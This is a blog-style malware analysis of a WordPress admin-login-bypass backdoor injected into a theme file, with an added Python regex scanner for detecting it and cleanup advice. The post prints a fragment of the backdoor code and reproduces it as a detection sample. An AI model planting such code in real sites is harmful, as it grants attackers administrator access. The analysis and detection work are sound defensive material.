Malicious script injected to WordPress theme allowing Admin Login Bypass

Labs Note

On a daily basis we find different kinds of malware like backdoors, credit card stealers, injected scripts, and phishing pages. While each one of those catches our attention, we recently found an interesting WordPress administration login bypass script.

This login-bypass technique is often used after a website has already been compromised: it lets attackers reach the post, page, and widget sections directly, without, for instance, spending hours in a brute-force attack trying different username and password combinations.

The malicious script (theme.php) was injected into the theme structure with the intention of blending in with legitimate code and going undetected.

Here is a snippet of the malware:

require('./../../../../../../../wp-blog-header.php');
$query_str = "SELECT ID FROM $wpdb->users";
…
if (user_can($user_id, 'administrator')) {
    …
    $user_login = $user_info->user_login;
    …
    do_action('wp_login', $user_login);
    echo "You are logged in as $user_login";
    if (function_exists('get_admin_url')) {
        wp_redirect(get_admin_url());

The code is very straightforward. First, it includes the wp-blog-header.php file, which subsequently loads functions from wp-config.php related to login capabilities.

Secondly, the malware checks whether the user_id fetched from the database has administrator privileges and retrieves the location of the ‘wp-admin’ URL via the ‘get_admin_url()’ function. If all these criteria match, the attacker is then redirected (wp_redirect) to the wp-admin URL with administrator access to the backend, without ever sending a username / password combination.
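The combination of calls described above is unusual for a theme file, which makes it a useful signature for a file-integrity or malware scan. The following Python scanner is an added example written for this note (not code from the original post or from Sucuri); it looks for the same indicators the snippet exhibits and only flags a file when at least two of them appear together, since some of the calls are legitimate on their own. The sample file contents are constructed, and the two-indicator threshold is an assumption.

```python
"""Heuristic scan of WordPress theme files for the admin-login-bypass pattern."""
import os
import re

# Each indicator is (name, regex). Individually some are benign; the
# combination seen in the injected theme.php is what warrants review.
INDICATORS = [
    ("bootstrap_via_traversal",  # theme file pulling in WP core by ../ traversal
     re.compile(r"(require|include)(_once)?\s*\(?\s*['\"](\./)?(\.\./){2,}[^'\"]*wp-blog-header\.php")),
    ("direct_users_query",       # raw SELECT against the users table
     re.compile(r"SELECT\s+ID\s+FROM\s+\$wpdb->users", re.I)),
    ("administrator_check",      # \b keeps current_user_can() from matching
     re.compile(r"\buser_can\s*\([^)]*['\"]administrator['\"]")),
    ("fires_wp_login_hook",      # core fires wp_login; a theme should not
     re.compile(r"do_action\s*\(\s*['\"]wp_login['\"]")),
    ("redirect_to_admin",
     re.compile(r"wp_redirect\s*\(\s*get_admin_url\s*\(")),
]
MIN_HITS = 2  # assumption: two or more indicators together => suspicious


def scan_php_source(source: str) -> list[str]:
    """Return the names of the indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS if rx.search(source)]


def is_suspicious(source: str) -> bool:
    return len(scan_php_source(source)) >= MIN_HITS


def scan_theme_dir(root: str) -> dict[str, list[str]]:
    """Walk a wp-content/themes tree; map each flagged .php path to its hits."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if len(hits) >= MIN_HITS:
                flagged[path] = hits
    return flagged


# Constructed samples (not real theme files): the first mirrors the fragment
# shown in the post, the second is what an ordinary functions.php looks like.
SUSPICIOUS_SAMPLE = """<?php
require('./../../../../../../../wp-blog-header.php');
$query_str = "SELECT ID FROM $wpdb->users";
if (user_can($user_id, 'administrator')) {
    do_action('wp_login', $user_login);
    wp_redirect(get_admin_url());
}
"""
BENIGN_SAMPLE = """<?php
add_action('after_setup_theme', 'mytheme_setup');
function mytheme_setup() { add_theme_support('title-tag'); }
if (is_user_logged_in() && current_user_can('administrator')) { echo 'admin'; }
"""

if __name__ == "__main__":
    print(scan_php_source(SUSPICIOUS_SAMPLE), scan_php_source(BENIGN_SAMPLE))
```

Run `scan_theme_dir("/path/to/wp-content/themes")` against a site to list files worth a manual look; a hit is a lead, not proof, so compare the file against a clean copy of the theme before removing it.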

In these types of attacks, we also noticed that bogus admin users may be created in the backend interface. If you suspect a compromise, or identify a user with administrator privileges that you did not create, we highly recommend taking a backup of your database, removing the user, and changing the passwords of all other users.

As a good security practice, users should have access only to the resources they need. WordPress implements this well through the different roles a user can have in the backend (Subscriber, Editor, Contributor, Author, Administrator, etc.). Make sure to take advantage of this feature to limit the damage a compromised account can do to your website and online presence.

We also recommend having a File Integrity Monitor in place and a Website Firewall to prevent further issues from happening.